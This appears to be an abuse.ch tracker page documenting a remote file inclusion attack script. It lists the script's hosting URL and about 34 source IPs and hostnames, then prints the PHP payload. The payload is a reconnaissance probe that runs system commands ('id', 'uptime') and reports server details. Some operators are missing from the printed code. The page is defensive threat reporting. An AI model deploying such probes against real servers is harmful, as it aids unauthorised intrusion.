Web abuse Tracker

Below you can see some information concerning the script with the MD5 c0c2ff0e5ae82a662df920f24e6f69a1. The page shows you the different locations (RFI URLs) of the script and the systems (IPs) which has tried to inject the script.

Script locations (RFI URLs)

Script URLFile hash (MD5)counter
http://www.medisite.fr/idc0c2ff0e5ae82a662df920f24e6f69a135

Related IPs

IP addressHostnameScript URLcountry
208.97.184.16 clamato.dreamhost.comhttp://www.medisite.fr/idUS
66.103.20.82 eserverspace.comhttp://www.medisite.fr/idUS
118.168.12.133 118-168-12-133.dynamic.hinet.nethttp://www.medisite.fr/idTW
208.113.229.158 defender.dreamhost.comhttp://www.medisite.fr/idUS
66.33.219.22 hillmont.dreamhost.comhttp://www.medisite.fr/idUS
121.199.14.40 ip199.hichina.comhttp://www.medisite.fr/idCN
65.110.45.30 65-110-45-30.static.sagonet.nethttp://www.medisite.fr/idUS
85.214.60.181 illusion-studio.bizhttp://www.medisite.fr/idDE
69.36.6.144 l014.iwsservers.comhttp://www.medisite.fr/idMX
208.113.242.69 franc.dreamhost.comhttp://www.medisite.fr/idUS
83.52.159.34 34.Red-83-52-159.dynamicIP.rima-tde.nethttp://www.medisite.fr/idES
207.44.134.32 ev1s-207-44-134-32.theplanet.comhttp://www.medisite.fr/idUS
207.58.128.120 ns1.yourusahost.comhttp://www.medisite.fr/idUS
219.118.71.117 lhx01.linkclub.jphttp://www.medisite.fr/idJP
87.104.34.140 http://www.medisite.fr/idDK
74.52.253.194 cheyenne.thmedia.nethttp://www.medisite.fr/idUS
203.251.81.219 http://www.medisite.fr/idKR
118.168.12.157 118-168-12-157.dynamic.hinet.nethttp://www.medisite.fr/idTW
67.19.155.98 kaden.micxz.nethttp://www.medisite.fr/idUS
83.52.148.111 111.Red-83-52-148.dynamicIP.rima-tde.nethttp://www.medisite.fr/idES
208.113.195.6 skylark.dreamhost.comhttp://www.medisite.fr/idUS
63.253.165.100 63-253-165-100.ip.mcleodusa.nethttp://www.medisite.fr/idUS
65.38.18.81 web1.diverge.comhttp://www.medisite.fr/idUS
83.217.86.130 83-217-86-130.no-reverse.nmv.behttp://www.medisite.fr/idBE
65.241.66.21 gallery.tabletopwarfare.comhttp://www.medisite.fr/idUS
72.167.32.192 ip-72-167-32-192.ip.secureserver.nethttp://www.medisite.fr/idUS
221.139.3.168 http://www.medisite.fr/idKR
81.169.136.128 pr.freeshophoster.dehttp://www.medisite.fr/idDE
115.145.170.167 dblab.skku.ac.krhttp://www.medisite.fr/idKR
216.8.84.204 host-216-8-84-204.bradshawconsulting.comhttp://www.medisite.fr/idUS
130.226.142.100 dkm.itu.dkhttp://www.medisite.fr/idDK
220.80.108.81 http://www.medisite.fr/idKR
81.88.233.203 http://www.medisite.fr/idIT
64.128.80.102 lexington.networkredux.nethttp://www.medisite.fr/idUS

RFI script

Firstseen:2009-08-12 21:57:05
Lastseen:2009-11-10 01:54:11
Script size:1'600 Bytes

<?php
$safe_mode = @ini_get('safe_mode');
function ConvertBytes($number)
{
        $len strlen($number);
        if($len 4)
        {
                return sprintf("%d b"$number);
        }
        if($len >= && $len <=6)
        {
                return sprintf("%0.2f Kb"$number/1024);
        }
        if($len >= && $len <=9)
        {
                return sprintf("%0.2f Mb"$number/1024/1024);
        }
   
        return sprintf("%0.2f Gb"$number/1024/1024/1024);
                           
}
echo (($safe_mode)?("Safe:<font color=green>ON_secure</font><br>"):("Safe:<font color=red>OFF_not_secure</font><br>"));
if(@is_writable($chdir)){ $permissiondir "YES"; }else{ $permissiondir "NO";  }


$un = @php_uname();
$up system(uptime);
$id1 system(id);
$pwd1 = @getcwd();
$sof1 getenv("SERVER_SOFTWARE");
$php1 phpversion();
$name1 $_SERVER['SERVER_NAME'];
$ip1 gethostbyname($SERVER_ADDR);
$free1diskfreespace($pwd1);
$free ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free 0;}
$all1disk_total_space($pwd1);
$all ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all 0;}
$used ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "<br><br>uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "Writable directory: $permissiondir<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;


© 2010 dnsbl.abuse.ch
Version 2.0 / 1.10.2008
economics-recluse
Urgent!